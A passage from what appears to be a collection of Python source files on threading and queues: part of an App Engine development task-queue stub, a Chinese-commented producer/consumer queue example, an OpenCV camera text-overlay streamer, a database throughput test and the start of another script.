header_proto = task.add_header()
header_proto.set_key(key)
header_proto.set_value(value)
return task
now_usec = _SecToUsec(time.time())
for _ in range(num_tasks):
self._InsertTask(RandomTask())
class _TaskExecutor(object):
"""Executor for a task object.
Converts a TaskQueueQueryTasksResponse_Task into a http request, then uses the
httplib library to send it to the http server.
"""
def __init__(self, default_host, request_data):
"""Constructor.
Args:
default_host: a string to use as the host/port to connect to if the host
header is not specified in the task.
request_data: A request_info.RequestInfo instance used to look up state
associated with the request that generated an API call.
"""
self._default_host = default_host
self._request_data = request_data
def _HeadersFromTask(self, task, queue):
"""Constructs the http headers for the given task.
This function will remove special headers (values in BUILT_IN_HEADERS) and
add the taskqueue headers.
Args:
task: The task, a TaskQueueQueryTasksResponse_Task instance.
queue: The queue that this task belongs to, an _Queue instance.
Returns:
A list of tuples containing the http header and value. There
may be be mutiple entries with the same key.
"""
headers = []
for header in task.header_list():
header_key_lower = header.key().lower()
if header_key_lower == 'host' and queue.target is not None:
headers.append(
(header.key(), '.'.join([queue.target, self._default_host])))
elif header_key_lower not in BUILT_IN_HEADERS:
headers.append((header.key(), header.value()))
headers.append(('X-AppEngine-QueueName', queue.queue_name))
headers.append(('X-AppEngine-TaskName', task.task_name()))
headers.append(('X-AppEngine-TaskRetryCount', str(task.retry_count())))
headers.append(('X-AppEngine-TaskETA',
str(_UsecToSec(task.eta_usec()))))
headers.append(('X-AppEngine-Fake-Is-Admin', '1'))
headers.append(('Content-Length', str(len(task.body()))))
if (task.has_body() and 'content-type' not in
[key.lower() for key, _ in headers]):
headers.append(('Content-Type', 'application/octet-stream'))
headers.append(('X-AppEngine-TaskExecutionCount',
str(task.execution_count())))
if task.has_runlog() and task.runlog().has_response_code():
headers.append(('X-AppEngine-TaskPreviousResponse',
str(task.runlog().response_code())))
return headers
def ExecuteTask(self, task, queue):
"""Construct a http request from the task and dispatch it.
Args:
task: The task to convert to a http request and then send. An instance of
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task
queue: The queue that this task belongs to. An instance of _Queue.
Returns:
Http Response code from the task's execution, 0 if an exception occurred.
"""
method = task.RequestMethod_Name(task.method())
headers = self._HeadersFromTask(task, queue)
dispatcher = self._request_data.get_dispatcher()
try:
response = dispatcher.add_request(method, task.url(), headers,
task.body() if task.has_body() else '',
'0.1.0.2')
except request_info.ModuleDoesNotExistError:
logging.exception('Failed to dispatch task')
return 0
return int(response.status.split(' ', 1)[0])
class _BackgroundTaskScheduler(object):
"""The task scheduler class.
This class is designed to be run in a background thread.
Note: There must not be more than one instance of _BackgroundTaskScheduler per
group.
"""
def __init__(self, group, task_executor, retry_seconds, **kwargs):
"""Constructor.
Args:
group: The group that we will automatically execute tasks from. Must be an
instance of _Group.
task_executor: The class used to convert a task into a http request. Must
be an instance of _TaskExecutor.
retry_seconds: The number of seconds to delay a task by if its execution
fails.
_get_time: a callable that returns the current time in seconds since the
epoch. This argument may only be passed in by keyword. If unset, use
time.time.
"""
self._group = group
self._should_exit = False
self._next_wakeup = INF
self._event = threading.Event()
self._wakeup_lock = threading.Lock()
self.task_executor = task_executor
self.default_retry_seconds = retry_seconds
self._get_time = kwargs.pop('_get_time', time.time)
if kwargs:
raise TypeError('Unknown parameters: %s' % ', '.join(kwargs))
def UpdateNextEventTime(self, next_event_time):
"""Notify the TaskExecutor of the closest event it needs to process.
Args:
next_event_time: The time of the event in seconds since the epoch.
"""
with self._wakeup_lock:
if next_event_time < self._next_wakeup:
self._next_wakeup = next_event_time
self._event.set()
def Shutdown(self):
"""Request this TaskExecutor to exit."""
self._should_exit = True
self._event.set()
def _ProcessQueues(self):
with self._wakeup_lock:
self._next_wakeup = INF
now = self._get_time()
queue, task = self._group.GetNextPushTask()
while task and _UsecToSec(task.eta_usec()) <= now:
if task.retry_count() == 0:
task.set_first_try_usec(_SecToUsec(now))
response_code = self.task_executor.ExecuteTask(task, queue)
if response_code:
task.mutable_runlog().set_response_code(response_code)
else:
logging.error(
'An error occured while sending the task "%s" '
'(Url: "%s") in queue "%s". Treating as a task error.',
task.task_name(), task.url(), queue.queue_name)
now = self._get_time()
if 200 <= response_code < 300:
queue.Delete(task.task_name())
else:
retry = Retry(task, queue)
age_usec = _SecToUsec(now) - task.first_try_usec()
if retry.CanRetry(task.retry_count() + 1, age_usec):
retry_usec = retry.CalculateBackoffUsec(task.retry_count() + 1)
logging.warning(
'Task %s failed to execute. This task will retry in %.3f seconds',
task.task_name(), _UsecToSec(retry_usec))
queue.PostponeTask(task, _SecToUsec(now) + retry_usec)
else:
logging.warning(
'Task %s failed to execute. The task has no remaining retries. '
'Failing permanently after %d retries and %d seconds',
task.task_name(), task.retry_count(), _UsecToSec(age_usec))
queue.Delete(task.task_name())
queue, task = self._group.GetNextPushTask()
if task:
with self._wakeup_lock:
eta = _UsecToSec(task.eta_usec())
if eta < self._next_wakeup:
self._next_wakeup = eta
def _Wait(self):
"""Block until we need to process a task or we need to exit."""
now = self._get_time()
while not self._should_exit and self._next_wakeup > now:
timeout = self._next_wakeup - now
self._event.wait(timeout)
self._event.clear()
now = self._get_time()
def MainLoop(self):
"""The main loop of the scheduler."""
while not self._should_exit:
self._ProcessQueues()
self._Wait()
class TaskQueueServiceStub(apiproxy_stub.APIProxyStub):
"""Python only task queue service stub.
This stub executes tasks when enabled by using the dev_appserver's AddEvent
capability. When task running is disabled this stub will store tasks for
display on a console, where the user may manually execute the tasks.
"""
def __init__(self,
service_name='taskqueue',
root_path=None,
auto_task_running=False,
task_retry_seconds=30,
_all_queues_valid=False,
default_http_server=None,
_testing_validate_state=False,
request_data=None):
"""Constructor.
Args:
service_name: Service name expected for all calls.
root_path: Root path to the directory of the application which may contain
a queue.yaml file. If None, then it's assumed no queue.yaml file is
available.
auto_task_running: When True, the dev_appserver should automatically
run tasks after they are enqueued.
task_retry_seconds: How long to wait between task executions after a
task fails.
_testing_validate_state: Should this stub and all of its _Groups (and
thus and all of its _Queues) validate their state after each
operation? This should only be used during testing of the
taskqueue_stub.
request_data: A request_info.RequestInfo instance used to look up state
associated with the request that generated an API call.
"""
super(TaskQueueServiceStub, self).__init__(
service_name, max_request_size=MAX_REQUEST_SIZE,
request_data=request_data)
self._queues = {}
self._all_queues_valid = _all_queues_valid
self._root_path = root_path
self._testing_validate_state = _testing_validate_state
self._queues[None] = _Group(
self._ParseQueueYaml, app_id=None,
_all_queues_valid=_all_queues_valid,
_update_newest_eta=self._UpdateNextEventTime,
_testing_validate_state=self._testing_validate_state)
self._auto_task_running = auto_task_running
self._started = False
self._task_scheduler = _BackgroundTaskScheduler(
self._queues[None], _TaskExecutor(default_http_server,
self.request_data),
retry_seconds=task_retry_seconds)
self._yaml_last_modified = None
def StartBackgroundExecution(self):
"""Start automatic task execution."""
if not self._started and self._auto_task_running:
task_scheduler_thread = threading.Thread(
target=self._task_scheduler.MainLoop)
task_scheduler_thread.setDaemon(True)
task_scheduler_thread.start()
self._started = True
def Shutdown(self):
"""Requests the task scheduler to shutdown."""
self._task_scheduler.Shutdown()
def _ParseQueueYaml(self):
"""Loads the queue.yaml file and parses it.
Returns:
None if queue.yaml doesn't exist, otherwise a queueinfo.QueueEntry object
populated from the queue.yaml.
"""
if hasattr(self, 'queue_yaml_parser'):
return self.queue_yaml_parser(self._root_path)
if self._root_path is None:
return None
for queueyaml in ('queue.yaml', 'queue.yml'):
try:
path = os.path.join(self._root_path, queueyaml)
modified = os.stat(path).st_mtime
if self._yaml_last_modified and self._yaml_last_modified == modified:
return self._last_queue_info
fh = open(path, 'r')
except (IOError, OSError):
continue
try:
queue_info = queueinfo.LoadSingleQueue(fh)
self._last_queue_info = queue_info
self._yaml_last_modified = modified
return queue_info
finally:
fh.close()
return None
def _UpdateNextEventTime(self, callback_time):
"""Enqueue a task to be automatically scheduled.
Note: If auto task running is disabled, this function is a no-op.
Args:
callback_time: The earliest time this task may be run, in seconds since
the epoch.
"""
self._task_scheduler.UpdateNextEventTime(callback_time)
def _GetGroup(self, app_id=None):
"""Get the _Group instance for app_id, creating a new one if needed.
Args:
app_id: The app id in question. Note: This field is not validated.
"""
if app_id not in self._queues:
self._queues[app_id] = _Group(
app_id=app_id, _all_queues_valid=self._all_queues_valid,
_testing_validate_state=self._testing_validate_state)
return self._queues[app_id]
def _Dynamic_Add(self, request, response):
"""Add a single task to a queue.
This method is a wrapper around the BulkAdd RPC request.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: The taskqueue_service_pb.TaskQueueAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueAddResponse. See
taskqueue_service.proto.
"""
bulk_request = taskqueue_service_pb.TaskQueueBulkAddRequest()
bulk_response = taskqueue_service_pb.TaskQueueBulkAddResponse()
bulk_request.add_add_request().CopyFrom(request)
self._Dynamic_BulkAdd(bulk_request, bulk_response)
assert bulk_response.taskresult_size() == 1
result = bulk_response.taskresult(0).result()
if result != taskqueue_service_pb.TaskQueueServiceError.OK:
raise apiproxy_errors.ApplicationError(result)
elif bulk_response.taskresult(0).has_chosen_task_name():
response.set_chosen_task_name(
bulk_response.taskresult(0).chosen_task_name())
def _Dynamic_BulkAdd(self, request, response):
"""Add many tasks to a queue using a single request.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See
taskqueue_service.proto.
"""
assert request.add_request_size(), 'taskqueue should prevent empty requests'
self._GetGroup(_GetAppId(request.add_request(0))).BulkAdd_Rpc(
request, response)
def GetQueues(self):
"""Gets all the application's queues.
Returns:
A list of dictionaries, where each dictionary contains one queue's
attributes. E.g.:
[{'name': 'some-queue',
'max_rate': '1/s',
'bucket_size': 5,
'oldest_task': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'tasks_in_queue': 12}, ...]
The list of queues always includes the default queue.
"""
return self._GetGroup().GetQueuesAsDicts()
def GetTasks(self, queue_name):
"""Gets a queue's tasks.
Args:
queue_name: Queue's name to return tasks for.
Returns:
A list of dictionaries, where each dictionary contains one task's
attributes. E.g.
[{'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
'headers': [('user-header', 'some-value')
('X-AppEngine-QueueName': 'update-queue'),
('X-AppEngine-TaskName': 'task-123'),
('X-AppEngine-TaskRetryCount': '0'),
('X-AppEngine-TaskETA': '1234567890.123456'),
('X-AppEngine-Development-Payload': '1'),
('Content-Length': 0),
('Content-Type': 'application/octet-stream')]
Raises:
ValueError: A task request contains an unknown HTTP method type.
KeyError: An invalid queue name was specified.
"""
return self._GetGroup().GetQueue(queue_name).GetTasksAsDicts()
def DeleteTask(self, queue_name, task_name):
"""Deletes a task from a queue, without leaving a tombstone.
Args:
queue_name: the name of the queue to delete the task from.
task_name: the name of the task to delete.
"""
if self._GetGroup().HasQueue(queue_name):
queue = self._GetGroup().GetQueue(queue_name)
queue.Delete(task_name)
queue.task_name_archive.discard(task_name)
def FlushQueue(self, queue_name):
"""Removes all tasks from a queue, without leaving tombstones.
Args:
queue_name: the name of the queue to remove tasks from.
"""
if self._GetGroup().HasQueue(queue_name):
self._GetGroup().GetQueue(queue_name).PurgeQueue()
self._GetGroup().GetQueue(queue_name).task_name_archive.clear()
def _Dynamic_UpdateQueue(self, request, unused_response):
"""Local implementation of the UpdateQueue RPC in TaskQueueService.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
unused_response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
Not used.
"""
self._GetGroup(_GetAppId(request)).UpdateQueue_Rpc(request, unused_response)
def _Dynamic_FetchQueues(self, request, response):
"""Local implementation of the FetchQueues RPC in TaskQueueService.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
self._GetGroup(_GetAppId(request)).FetchQueues_Rpc(request, response)
def _Dynamic_FetchQueueStats(self, request, response):
"""Local 'random' implementation of the TaskQueueService.FetchQueueStats.
This implementation loads some stats from the task store, the rest with
random numbers.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse.
"""
self._GetGroup(_GetAppId(request)).FetchQueueStats_Rpc(request, response)
def _Dynamic_QueryTasks(self, request, response):
"""Local implementation of the TaskQueueService.QueryTasks RPC.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
self._GetGroup(_GetAppId(request)).QueryTasks_Rpc(request, response)
def _Dynamic_FetchTask(self, request, response):
"""Local implementation of the TaskQueueService.FetchTask RPC.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
self._GetGroup(_GetAppId(request)).FetchTask_Rpc(request, response)
def _Dynamic_Delete(self, request, response):
"""Local delete implementation of TaskQueueService.Delete.
Deletes tasks from the task store. A 1/20 chance of a transient error.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
self._GetGroup(_GetAppId(request)).Delete_Rpc(request, response)
def _Dynamic_ForceRun(self, request, response):
"""Local force run implementation of TaskQueueService.ForceRun.
Forces running of a task in a queue. This will fail randomly for testing if
the app id is non-empty.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueForceRunRequest.
response: A taskqueue_service_pb.TaskQueueForceRunResponse.
"""
if _GetAppId(request) is not None:
if random.random() <= 0.05:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR)
elif random.random() <= 0.052:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR)
else:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.OK)
else:
group = self._GetGroup(None)
if not group.HasQueue(request.queue_name()):
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
return
queue = group.GetQueue(request.queue_name())
task = queue.Lookup(1, name=request.task_name())
if not task:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK)
return
queue.RunTaskNow(task[0])
self._UpdateNextEventTime(0)
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.OK)
def _Dynamic_DeleteQueue(self, request, response):
"""Local delete implementation of TaskQueueService.DeleteQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest.
response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
self._GetGroup(app_id).DeleteQueue_Rpc(request, response)
def _Dynamic_PauseQueue(self, request, response):
"""Local pause implementation of TaskQueueService.PauseQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePauseQueueRequest.
response: A taskqueue_service_pb.TaskQueuePauseQueueResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
self._GetGroup(app_id).PauseQueue_Rpc(request, response)
def _Dynamic_PurgeQueue(self, request, response):
"""Local purge implementation of TaskQueueService.PurgeQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest.
response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse.
"""
self._GetGroup(_GetAppId(request)).PurgeQueue_Rpc(request, response)
def _Dynamic_DeleteGroup(self, request, response):
"""Local delete implementation of TaskQueueService.DeleteGroup.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteGroupRequest.
response: A taskqueue_service_pb.TaskQueueDeleteGroupResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
if app_id in self._queues:
del self._queues[app_id]
else:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
def _Dynamic_UpdateStorageLimit(self, request, response):
"""Local implementation of TaskQueueService.UpdateStorageLimit.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateStorageLimitRequest.
response: A taskqueue_service_pb.TaskQueueUpdateStorageLimitResponse.
"""
if _GetAppId(request) is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
if request.limit() < 0 or request.limit() > 1000 * (1024 ** 4):
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
response.set_new_limit(request.limit())
def _Dynamic_QueryAndOwnTasks(self, request, response):
"""Local implementation of TaskQueueService.QueryAndOwnTasks.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
Raises:
InvalidQueueModeError: If target queue is not a pull queue.
"""
self._GetGroup().QueryAndOwnTasks_Rpc(request, response)
def _Dynamic_ModifyTaskLease(self, request, response):
"""Local implementation of TaskQueueService.ModifyTaskLease.
Args:
request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest.
response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse.
Raises:
InvalidQueueModeError: If target queue is not a pull queue.
"""
self._GetGroup().ModifyTaskLease_Rpc(request, response)
def get_filtered_tasks(self, url=None, name=None, queue_names=None):
"""Get the tasks in the task queue with filters.
Args:
url: A URL that all returned tasks should point at.
name: The name of all returned tasks.
queue_names: A list of queue names to retrieve tasks from. If left blank
this will get default to all queues available.
Returns:
A list of taskqueue.Task objects.
"""
all_queue_names = [queue['name'] for queue in self.GetQueues()]
if isinstance(queue_names, basestring):
queue_names = [queue_names]
if queue_names is None:
queue_names = all_queue_names
task_dicts = []
for queue_name in queue_names:
if queue_name in all_queue_names:
for task in self.GetTasks(queue_name):
if url is not None and task['url'] != url:
continue
if name is not None and task['name'] != name:
continue
task_dicts.append(task)
tasks = []
for task in task_dicts:
payload = base64.b64decode(task['body'])
headers = dict(task['headers'])
headers['Content-Length'] = str(len(payload))
eta = datetime.datetime.strptime(task['eta'], '%Y/%m/%d %H:%M:%S')
eta = eta.replace(tzinfo=taskqueue._UTC)
task_object = taskqueue.Task(name=task['name'], method=task['method'],
url=task['url'], headers=headers,
payload=payload, eta=eta)
tasks.append(task_object)
return tasks
|
queue_0408.py
|
# -*- coding: utf-8 -*-
# @version : Python3.6
# @Time : 2017/4/8 16:55
# @Author : Jianyang-Hu
# @contact : jianyang1993@163.com
# @File : queue_0408.py
# @Software: PyCharm
"""
queue 队列:
适用于多线程编程的先进先出数据结构,可以用来安全的传递多线程信息。
queue 方法:
先进先出 q = Queue.Queue(maxsize)
后进先出 a = Queue.LifoQueue(maxsize)
优先级 Queue.PriorityQueue(maxsize)
q = queue.Queue(maxsize=0) # 构造一个先进显出队列,maxsize指定队列长度,为0 时,表示队列长度无限制。
q.join() # 等到队列为kong的时候,在执行别的操作
q.qsize() # 返回队列的大小 (不可靠)
q.empty() # 当队列为空的时候,返回True 否则返回False (不可靠)
q.full() # 当队列满的时候,返回True,否则返回False (不可靠)
q.put(item, block=True, timeout=None) # 将item放入Queue尾部,item必须存在,可以参数block默认为True,
表示当队列满时,会等待队列给出可用位置,为False时为非阻塞,此时如果队列已满,会引发queue.Full 异常。
可选参数timeout,表示 会阻塞设置的时间,过后,如果队列无法给出放入item的位置,则引发 queue.Full 异常
q.get(block=True, timeout=None) # 移除并返回队列头部的一个值,可选参数block默认为True,表示获取值的时候,
如果队列为空,则阻塞,为False时,不阻塞,若此时队列为空,则引发 queue.Empty异常。
可选参数timeout,表示会阻塞设置的时候,过后,如果队列为空,则引发Empty异常。
q.put_nowait(item) # 等效于 put(item,block=False)
q.get_nowait() # 等效于 get(item,block=False)
"""
#生产者消费者模型
import queue
import threading
#创建一个队列(容器)先进先出,设置容器大小为10 只能添加10个数据或者元素
que = queue.Queue(10)
def s(i):
que.put(i)
print("size:", que.qsize())
def x(i):
g = que.get(i)
#print("get:", g)
for i in range(1, 13):
t = threading.Thread(target=s, args=(i,))
t.start()
for i in range(1, 11):
t = threading.Thread(target=x, args=(i,))
t.start()
print("size:", que.qsize())
|
OverlayCamera.py
|
import time
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
import cv2
import textwrap
from .settings import STREAM_URL
from .settings import TEXT_DATA_REFRESH
from .settings import TEXT_SPACE, TEXT_SIZE
from .settings import TEXT_FONT, TEXT_THICCNESS, TEXT_COLOR
from .settings import TEXT_DATA_FILENAMES
from .settings import TEXT_WRAP, TEXT_MARGINES, TEXT_MARGINES_BETWEEN_FILES
from .settings import TEXT_ALIGNMENTS, TEXT_ALIGNMENT_VERTICAL, TEXT_ALIGNMENT_HORIZONTAL
from .settings import OUTPUT_SCALE
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
last_update = time.time()
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@staticmethod
def frames():
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@staticmethod
def _update():
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting camera thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
time.sleep(0)
if time.time() - BaseCamera.last_update > TEXT_DATA_REFRESH:
BaseCamera.last_update = time.time()
cls._update()
BaseCamera.thread = None
class OverlayCamera(BaseCamera):
textLines = ['']
textData = (0, 0)
offset = (0, 0)
render_pos = [0, 0]
width = 0
height = 0
@staticmethod
def _update():
OverlayCamera.textLines = []
height = 0
max_width = 0
number_of_lines = 0
for textFileName in TEXT_DATA_FILENAMES:
if textFileName == None:
OverlayCamera.textLines.append([])
try:
with open(textFileName, 'r') as textData:
pureTextLines = [x.strip() for x in textData.readlines()]
wrappedLines = []
for pureTextLine in pureTextLines:
wrappedLines.extend(textwrap.wrap(pureTextLine, width=TEXT_WRAP))
OverlayCamera.textLines.append(wrappedLines)
number_of_lines += len(OverlayCamera.textLines[-1])
for textLine in wrappedLines:
lineSize = cv2.getTextSize(textLine, TEXT_FONT, TEXT_SIZE, TEXT_THICCNESS)[0]
max_width = max(max_width, lineSize[0])
height = (lineSize[1] + 10) * TEXT_SIZE
except:
print(f'[ERROR] File {textFileName} not available')
OverlayCamera.textData = (max_width, height)
OverlayCamera.offset = (int(max_width), int(height * number_of_lines))
# print('yes')
# print(number_of_lines)
# print(OverlayCamera.textData)
OverlayCamera.render_pos = [0, 0]
if TEXT_ALIGNMENT_VERTICAL == TEXT_ALIGNMENTS.START:
OverlayCamera.render_pos[1] = 0
elif TEXT_ALIGNMENT_VERTICAL == TEXT_ALIGNMENTS.CENTER:
OverlayCamera.render_pos[1] = int(OverlayCamera.height / 2 - OverlayCamera.offset[1] / 2)
elif TEXT_ALIGNMENT_VERTICAL == TEXT_ALIGNMENTS.END:
OverlayCamera.render_pos[1] = int(OverlayCamera.height - OverlayCamera.offset[1])
if TEXT_ALIGNMENT_HORIZONTAL == TEXT_ALIGNMENTS.START:
OverlayCamera.render_pos[0] = 0 + OverlayCamera.width
elif TEXT_ALIGNMENT_HORIZONTAL == TEXT_ALIGNMENTS.CENTER:
OverlayCamera.render_pos[0] = int(TEXT_SPACE / 2 - OverlayCamera.offset[0]) + OverlayCamera.width + 1
elif TEXT_ALIGNMENT_HORIZONTAL == TEXT_ALIGNMENTS.END:
OverlayCamera.render_pos[0] = int(TEXT_SPACE - OverlayCamera.offset[0]) + OverlayCamera.width + 1
OverlayCamera.render_pos[0] += (TEXT_MARGINES[3] - TEXT_MARGINES[1])
OverlayCamera.render_pos[1] += (TEXT_MARGINES[0] - TEXT_MARGINES[2])
@staticmethod
def frames():
vcap = cv2.VideoCapture(STREAM_URL)
if not vcap.isOpened():
raise RuntimeError('Could not start camera.')
OverlayCamera.width = int(vcap.get(3))
OverlayCamera.height = int(vcap.get(4))
DIM = (int((TEXT_SPACE + vcap.get(3)) * OUTPUT_SCALE), int(vcap.get(4) * OUTPUT_SCALE))
OverlayCamera._update()
last_frame = None
while True:
# read current frame
_, frame = vcap.read()
frame = cv2.copyMakeBorder(frame, 0, 0, 0, TEXT_SPACE, cv2.BORDER_CONSTANT, value=(255, 255, 255))
y = 0
x = 0
try:
for textFile in OverlayCamera.textLines:
for line in textFile:
cv2.putText(frame, line, (OverlayCamera.render_pos[0] + x, OverlayCamera.render_pos[1] + y), TEXT_FONT, TEXT_SIZE, TEXT_COLOR, TEXT_THICCNESS)
y += OverlayCamera.textData[1]
y += TEXT_MARGINES_BETWEEN_FILES[0] - TEXT_MARGINES_BETWEEN_FILES[2]
x += TEXT_MARGINES_BETWEEN_FILES[3] - TEXT_MARGINES_BETWEEN_FILES[1]
except:
print('[ERROR] Something wrong with text')
frame = cv2.resize(frame, DIM, interpolation = cv2.INTER_AREA)
# encode as a jpeg image and return it
try:
yield cv2.imencode('.jpg', frame)[1].tobytes()
except:
yield cv2.imencode('.jpg', last_frame)[1].tobytes()
else:
last_frame = frame
|
database_throughput_test.py
|
#!/usr/bin/env python3
# Coyright 2017-2019 Nativepython Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import argparse
import sys
import time
from object_database import connect, Schema
def main(argv):
parser = argparse.ArgumentParser("Run a database throughput test")
parser.add_argument("host")
parser.add_argument("port")
parser.add_argument(
"--service-token", type=str, required=True,
help="the auth token to be used with this service"
)
parser.add_argument("seconds", type=float)
parser.add_argument("--threads", dest='threads', type=int, default=1)
parsedArgs = parser.parse_args(argv[1:])
db = connect(parsedArgs.host, parsedArgs.port, parsedArgs.service_token)
schema = Schema("database_throughput_test")
@schema.define
class Counter:
k = int
db.subscribeToSchema(schema)
t0 = time.time()
transactionCount = []
def doWork():
with db.transaction():
c = Counter()
while time.time() - t0 < parsedArgs.seconds:
with db.transaction():
c.k = c.k + 1
with db.view():
transactionCount.append(c.k)
threads = [threading.Thread(target=doWork) for _ in range(parsedArgs.threads)]
for t in threads:
t.start()
for t in threads:
t.join()
print(sum(transactionCount) / parsedArgs.seconds, " transactions per second")
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
SHM.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 15 09:38:01 2021
@author: zjl-seu
"""
import cv2
import time
import numpy as np
import tkinter as tk
from VRmodel import VR
from threading import Thread
